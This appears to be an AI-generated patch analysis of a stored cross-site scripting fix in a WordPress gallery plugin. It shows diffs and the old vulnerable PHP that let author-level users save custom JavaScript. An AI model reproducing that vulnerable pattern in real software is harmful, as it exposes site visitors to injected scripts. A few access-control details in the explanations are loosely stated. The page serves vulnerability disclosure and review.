Shared security patch analysis results
AI Used: claude_cli haikuComprehensive security analysis generated by AI for each confirmed CVE match. Click on a CVE to view the detailed writeup including vulnerability background, technical details, patch analysis, and PoC guide.
--- cache/final-tiles-grid-gallery-lite_3.6.8/FinalTilesGalleryLite.php 2025-12-21 09:35:59.449067309 +0000+++ cache/final-tiles-grid-gallery-lite_3.6.9/FinalTilesGalleryLite.php 2025-12-21 09:36:06.017475588 +0000@@ -3,7 +3,7 @@ /** * Plugin Name: Final Tiles Grid Gallery - Image Gallery * Description: WordPress Plugin for creating responsive image galleries. - * Version: 3.6.8 + * Version: 3.6.9 * Author: WPChill * Author URI: https://wpchill.com * Tested up to: 6.9 @@ -25,7 +25,7 @@ * Original Author: https://profiles.wordpress.org/greentreealbs/ * */ -define( 'FTGVERSION', '3.6.8' ); +define( 'FTGVERSION', '3.6.9' ); // Create a helper function for easy SDK access. if ( !function_exists( 'ftg_fs' ) ) { // Create a helper function for easy SDK access. @@ -1134,7 +1134,7 @@ if ( current_user_can( 'unfiltered_html' ) ) { $script = ( isset( $_POST['ftg_script'] ) ? wp_kses_post( wp_unslash( $_POST['ftg_script'] ) ) : '' ); } else { - $script = ( isset( $_POST['ftg_script'] ) ? wp_strip_all_tags( wp_unslash( $_POST['ftg_script'] ) ) : '' ); + $script = ''; } $captionEffectDuration = ( isset( $_POST['ftg_captionEffectDuration'] ) ? absint( $_POST['ftg_captionEffectDuration'] ) : 250 ); $id = ( isset( $_POST['ftg_gallery_edit'] ) ? absint( $_POST['ftg_gallery_edit'] ) : 0 );
Vulnerability Existed: yes
TRUE POSITIVE
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - CWE-79 - FinalTilesGalleryLite.php Lines 1134-1137
Old Code:
```php
if ( current_user_can( 'unfiltered_html' ) ) {
$script = ( isset( $_POST['ftg_script'] ) ? wp_kses_post( wp_unslash( $_POST['ftg_script'] ) ) : '' );
} else {
$script = ( isset( $_POST['ftg_script'] ) ? wp_strip_all_tags( wp_unslash( $_POST['ftg_script'] ) ) : '' );
}
```
Fixed Code:
```php
if ( current_user_can( 'unfiltered_html' ) ) {
$script = ( isset( $_POST['ftg_script'] ) ? wp_kses_post( wp_unslash( $_POST['ftg_script'] ) ) : '' );
} else {
$script = '';
}
```
Explanation:
The old code attempted to sanitize user input from `$_POST['ftg_script']` for non-privileged users using `wp_strip_all_tags()`. However, this function only removes HTML tags and is insufficient for preventing XSS attacks when the input is used in a context where it could be interpreted as executable code (such as inline JavaScript). The fix removes the user input entirely for non-privileged users (`$script = ''`), which prevents the vulnerability by ensuring untrusted input cannot reach the output. This is the correct approach: privileged users (with 'unfiltered_html' capability) can use `wp_kses_post()` for proper sanitization, while unprivileged users should not have access to script content at all.
The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Custom scripts' setting in all versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
--- cache/final-tiles-grid-gallery-lite_3.6.8/admin/include/fields.php 2025-12-21 09:35:59.433066315 +0000+++ cache/final-tiles-grid-gallery-lite_3.6.9/admin/include/fields.php 2025-12-21 09:36:06.005474842 +0000@@ -933,13 +933,15 @@ "proCall" => false, "excludeFrom" => array("shortcode"), ) ); -$this->addField( "Customizations", "script", array( - "name" => esc_html__( "Custom scripts", "final-tiles-grid-gallery-lite" ), - "type" => "textarea", - "description" => wp_kses( __( "This script will be called after the gallery initialization. Useful for custom lightboxes.\r\n <br />\r\n <br />\r\n <strong>Write just the code without using the <script></script> tags</strong>", "final-tiles-grid-gallery-lite" ), array() ), - "proCall" => false, - "excludeFrom" => array("shortcode"), -) ); +if ( current_user_can( 'unfiltered_html' ) ) { + $this->addField( "Customizations", "script", array( + "name" => esc_html__( "Custom scripts", "final-tiles-grid-gallery-lite" ), + "type" => "textarea", + "description" => wp_kses( __( "This script will be called after the gallery initialization. Useful for custom lightboxes.\r\n <br />\r\n <br />\r\n <strong>Write just the code without using the <script></script> tags</strong>", "final-tiles-grid-gallery-lite" ), array() ), + "proCall" => false, + "excludeFrom" => array("shortcode"), + ) ); +} $this->addField( "Customizations", "delay", array( "name" => esc_html__( "Delay", "final-tiles-grid-gallery-lite" ), "type" => "text",
Vulnerability Existed: yes
TRUE POSITIVE
Improper Access Control / Missing Authorization Check - CWE-276 - admin/include/fields.php lines 936-944
[Old Code]
```php
$this->addField( "Customizations", "script", array(
"name" => esc_html__( "Custom scripts", "final-tiles-grid-gallery-lite" ),
"type" => "textarea",
"description" => wp_kses( __( "This script will be called after the gallery initialization. Useful for custom lightboxes.\r\n <br />\r\n <br />\r\n <strong>Write just the code without using the <script></script> tags</strong>", "final-tiles-grid-gallery-lite" ), array() ),
"proCall" => false,
"excludeFrom" => array("shortcode"),
) );
```
[Fixed Code]
```php
if ( current_user_can( 'unfiltered_html' ) ) {
$this->addField( "Customizations", "script", array(
"name" => esc_html__( "Custom scripts", "final-tiles-grid-gallery-lite" ),
"type" => "textarea",
"description" => wp_kses( __( "This script will be called after the gallery initialization. Useful for custom lightboxes.\r\n <br />\r\n <br />\r\n <strong>Write just the code without using the <script></script> tags</strong>", "final-tiles-grid-gallery-lite" ), array() ),
"proCall" => false,
"excludeFrom" => array("shortcode"),
) );
}
```
Explanation:
The original code exposed a custom script input field to all authenticated users without verifying their capabilities. This allows lower-privileged users (e.g., contributors, editors) to inject arbitrary JavaScript code that executes after gallery initialization, potentially leading to stored XSS attacks or privilege escalation. The fix restricts this field to only users with the `unfiltered_html` capability (typically administrators), preventing unauthorized code injection. This is a critical security fix that properly implements capability-based access control in WordPress.
The Image Photo Gallery Final Tiles Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Custom scripts' setting in all versions up to, and including, 3.6.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.